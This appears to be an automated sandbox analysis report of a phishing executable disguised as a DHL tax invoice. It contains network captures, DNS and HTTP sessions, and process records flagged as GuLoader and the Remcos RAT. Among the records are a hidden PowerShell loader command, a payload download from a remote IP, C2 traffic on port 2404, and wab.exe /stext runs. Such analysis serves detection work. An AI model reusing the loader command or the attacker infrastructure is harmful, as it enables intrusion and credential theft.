                                                          Mar 28, 2024 08:02:03.626939058 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.626951933 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.626959085 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.626967907 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.626977921 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.626980066 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.626995087 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.627013922 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.628074884 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.628279924 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.628320932 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.628427982 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.628443003 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.628457069 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.628474951 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.628580093 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.628593922 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.628606081 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.628616095 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.628628969 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.628643990 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.628808975 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.628823996 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.628835917 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.628844023 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.628849030 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.628861904 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.629978895 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.630016088 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.630165100 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.630182028 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.630193949 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.630215883 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.630335093 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.630347967 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.630362034 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.630387068 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.630403996 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.630523920 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.630537987 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.630548954 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.630562067 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.630577087 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.630584002 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.630609989 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.630695105 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.630728006 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.632061005 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.632226944 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.632241011 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.632253885 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.632262945 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.632291079 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.632385015 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.632400990 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.632411957 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.632433891 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.632594109 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.632606983 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.632630110 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.632762909 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.632774115 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.632780075 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.632802963 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.632903099 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.632915974 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.632936001 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.633488894 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.633528948 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.633579969 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.633630037 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.633663893 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.633682966 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.633699894 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.633747101 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.633763075 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.633832932 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.633894920 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.642029047 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.680402994 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.680459023 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.680494070 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.740705013 CET8049739178.237.33.50192.168.2.4
                                                          Mar 28, 2024 08:02:03.740890026 CET4973980192.168.2.4178.237.33.50
                                                          Mar 28, 2024 08:02:03.741812944 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.741827965 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.741858959 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.741872072 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.741879940 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.741894007 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.741925955 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.741950035 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.741964102 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.741975069 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.741987944 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.741988897 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.742002010 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742016077 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.742043972 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.742047071 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742058992 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742083073 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742098093 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.742108107 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742140055 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742151022 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.742165089 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742178917 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742201090 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.742207050 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742247105 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.742257118 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742269039 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742280960 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742294073 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742306948 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.742335081 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.742341995 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742398024 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742434978 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.742456913 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742505074 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742544889 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.742546082 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742599010 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742640018 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.742655993 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742705107 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742743969 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.742749929 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742800951 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742841005 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.742855072 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742916107 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742954969 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742955923 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743036032 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743051052 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743065119 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743077040 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743078947 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743103981 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743119001 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743156910 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743171930 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743185043 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743196011 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743213892 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743218899 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743237019 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743248940 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743261099 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743304014 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743316889 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743330002 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743343115 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743369102 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743391037 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743405104 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743417978 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743429899 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743454933 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743457079 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743469954 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743480921 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743493080 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743504047 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743516922 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743537903 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743541956 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743554115 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743580103 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743602991 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743617058 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743643045 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743658066 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743671894 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743683100 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743695974 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743721962 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743741035 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743755102 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743767977 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743792057 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743793964 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743829012 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743835926 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743848085 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743907928 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743907928 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743937969 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743968010 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743973017 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744024038 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744060040 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.744072914 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744086027 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744122982 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.744136095 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744158983 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744195938 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.744204998 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744285107 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744296074 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744307995 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744321108 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744326115 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.744334936 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744347095 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.744352102 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744364023 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744369030 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.744400024 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.744420052 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744435072 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744446039 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744457960 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744468927 CET497382404192.168.2.4162.251.122.89
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 28, 2024 08:02:02.261436939 CET | 54634 | 53 | 192.168.2.4 | 1.1.1.1
Mar 28, 2024 08:02:02.358290911 CET | 53 | 54634 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 28, 2024 08:02:02.261436939 CET | 192.168.2.4 | 1.1.1.1 | 0x5777 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 28, 2024 08:02:02.358290911 CET | 1.1.1.1 | 192.168.2.4 | 0x5777 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                                          • 83.137.157.76
                                                          • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 83.137.157.76 | 80 | 7824 | C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp | Bytes transferred | Direction | Data
Mar 28, 2024 08:01:59.486421108 CET | 179 | OUT | GET /gDuOvMZLyhtbvV140.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: 83.137.157.76
Cache-Control: no-cache
Mar 28, 2024 08:01:59.688487053 CET | 1286 | IN | HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Wed, 27 Mar 2024 11:40:06 GMT
Accept-Ranges: bytes
ETag: "27c8df833b80da1:0"
Server: Microsoft-IIS/10.0
Date: Thu, 28 Mar 2024 07:01:59 GMT
Content-Length: 494656


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49739 | 178.237.33.50 | 80 | 7824 | C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp | Bytes transferred | Direction | Data
Mar 28, 2024 08:02:02.546374083 CET | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Mar 28, 2024 08:02:02.740959883 CET | 1197 | IN | HTTP/1.1 200 OK
date: Thu, 28 Mar 2024 07:02:02 GMT
server: Apache
content-length: 989
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
                                                          Data Ascii: { "geoplugin_request":"102.165.48.43", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Washington", "geoplugin_region":"District of Columbia", "geoplugin_regionCode":"DC", "geoplugin_regionName":"District of Columbia", "geoplugin_areaCode":"", "geoplugin_dmaCode":"511", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"38.894", "geoplugin_longitude":"-77.0365", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                          Target ID:0
                                                          Start time:08:00:50
                                                          Start date:28/03/2024
                                                          Path:C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe"
                                                          Imagebase:0x400000
                                                          File size:870'646 bytes
                                                          MD5 hash:9751F18FB374BF112F867381A68BB3A9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:1
                                                          Start time:08:00:51
                                                          Start date:28/03/2024
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"powershell.exe" -windowstyle hidden "$Panoramic=Get-Content 'C:\Users\user\AppData\Local\releve\Handelshindringens.Dec';$Voldtgtsforbryders=$Panoramic.SubString(51097,3);.$Voldtgtsforbryders($Panoramic)"
                                                          Imagebase:0xfe0000
                                                          File size:433'152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2320550123.000000000B115000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:2
                                                          Start time:08:00:51
                                                          Start date:28/03/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:3
                                                          Start time:08:00:52
                                                          Start date:28/03/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
                                                          Imagebase:0x240000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:7
                                                          Start time:08:01:47
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2866475335.0000000002FAF000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2870944268.00000000089CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2870944268.00000000089B2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:moderate
                                                          Has exited:false

                                                          Target ID:8
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:9
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:10
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:11
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:12
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:13
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:14
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
